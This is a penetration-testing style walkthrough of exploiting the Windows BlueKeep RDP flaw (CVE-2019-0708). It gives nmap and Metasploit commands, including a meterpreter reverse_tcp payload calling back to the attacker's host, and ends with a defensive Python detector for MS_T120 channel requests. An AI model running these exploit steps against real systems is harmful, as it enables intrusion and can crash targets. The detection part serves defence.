🧨Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

CVE-2019-0708 - BlueKeep

  • BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that could allow attackers to remotely execute arbitrary code, gain access to a Windows system and, consequently, to the network that the target system is a part of.

  • The BlueKeep vulnerability was made public by Microsoft in May 2019.

  • The BlueKeep exploit takes advantage of a vulnerability in Windows' RDP implementation that gives attackers access to a chunk of kernel memory, which in turn lets them remotely execute arbitrary code at the system level without authentication.

  • Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.

  • At the time of discovery, about 1 million systems worldwide were found to be vulnerable.

  • The BlueKeep vulnerability affects multiple versions of Windows:

    • XP

    • Vista

    • Windows 7

    • Windows Server 2008 & R2

  • Various illegitimate PoCs and exploit scripts circulate for BlueKeep, and some of them are malicious in nature. It is therefore recommended to use only verified exploit code and modules for exploitation.

  • Metasploit (MSF) provides an auxiliary module that can be used to check whether a target system is vulnerable to BlueKeep, and an exploit module that can be used to exploit the vulnerability on unpatched systems.

  • The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged Meterpreter session on the target system.

Note: The exploit targets kernel-space memory, so a failed attempt can crash the target system.

Attack Flow for the Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

1. Confirm Presence of RDP

Objective: Verify if the target system has RDP (Remote Desktop Protocol) enabled.

Command:

nmap -p 3389 <Target_IP>

Description: Use Nmap to scan port 3389 on the target system to check whether the RDP service is reachable.

2. Assess BlueKeep Vulnerability

Objective: Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

Command:

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run

Description: Use the cve_2019_0708_bluekeep scanner module in Metasploit to check whether the target system is vulnerable to BlueKeep without attempting exploitation.

3. Exploit BlueKeep Vulnerability

Objective: Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

Command:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the cve_2019_0708_bluekeep_rce exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.
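On the defensive side, the attack flow above can be detected on the wire: the CVE-2019-0708 code path is reached when an RDP client asks, by name, for the MS_T120 static virtual channel in the CS_NET block of its MCS Connect Initial (MS-RDPBCGR TS_UD_CS_NET), a channel legitimate clients never request. The following is an added example, not code from the original page or from Metasploit: it parses the client's GCC user-data blocks, extracts the requested channel names and flags MS_T120, using constructed sample blocks rather than a real capture.

```python
import struct

CS_NET = 0xC003            # TS_UD_CS_NET header type (MS-RDPBCGR 2.2.1.3.4)
CS_CORE = 0xC001           # TS_UD_CS_CORE header type, skipped here
CHANNEL_DEF_SIZE = 12      # CHANNEL_DEF: 8-byte name + 4-byte options


def parse_client_channels(user_data: bytes) -> list:
    """Walk the client user-data blocks (TS_UD_HEADER: type u16le, length u16le,
    length includes the 4-byte header) and return the static virtual channel
    names requested in the CS_NET block. Raises ValueError on malformed input."""
    names = []
    offset = 0
    while offset + 4 <= len(user_data):
        block_type, length = struct.unpack_from("<HH", user_data, offset)
        if length < 4 or offset + length > len(user_data):
            raise ValueError("truncated or malformed user-data block")
        if block_type == CS_NET:
            body = user_data[offset + 4:offset + length]
            if len(body) < 4:
                raise ValueError("CS_NET block too short for channelCount")
            (count,) = struct.unpack_from("<I", body, 0)
            if 4 + count * CHANNEL_DEF_SIZE > len(body):
                raise ValueError("channelCount exceeds CS_NET block length")
            for i in range(count):
                start = 4 + i * CHANNEL_DEF_SIZE
                raw_name = body[start:start + 8].split(b"\x00", 1)[0]
                names.append(raw_name.decode("ascii", "replace"))
        offset += length
    return names


def requests_ms_t120(user_data: bytes) -> bool:
    """MS_T120 is bound internally by the server; a client naming it is
    exercising the BlueKeep code path (the server compares names
    case-insensitively, so we do too)."""
    return any(n.upper() == "MS_T120" for n in parse_client_channels(user_data))


def build_user_data(channel_names) -> bytes:
    """Construct CS_CORE (dummy body) + CS_NET blocks for testing; not a capture."""
    core = struct.pack("<HH", CS_CORE, 4 + 8) + b"\x00" * 8
    defs = b"".join(n.encode("ascii").ljust(8, b"\x00") + struct.pack("<I", 0)
                    for n in channel_names)
    body = struct.pack("<I", len(channel_names)) + defs
    return core + struct.pack("<HH", CS_NET, 4 + len(body)) + body


# Constructed samples: an ordinary client and an exploit-style request.
BENIGN = build_user_data(["rdpdr", "rdpsnd", "cliprdr"])
SUSPECT = build_user_data(["rdpdr", "MS_T120", "cliprdr"])
```

A scanner check from Metasploit also sends an MS_T120 request, so this logic flags vulnerability scans as well as exploitation attempts; a raised ValueError on a malformed block is itself worth logging.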
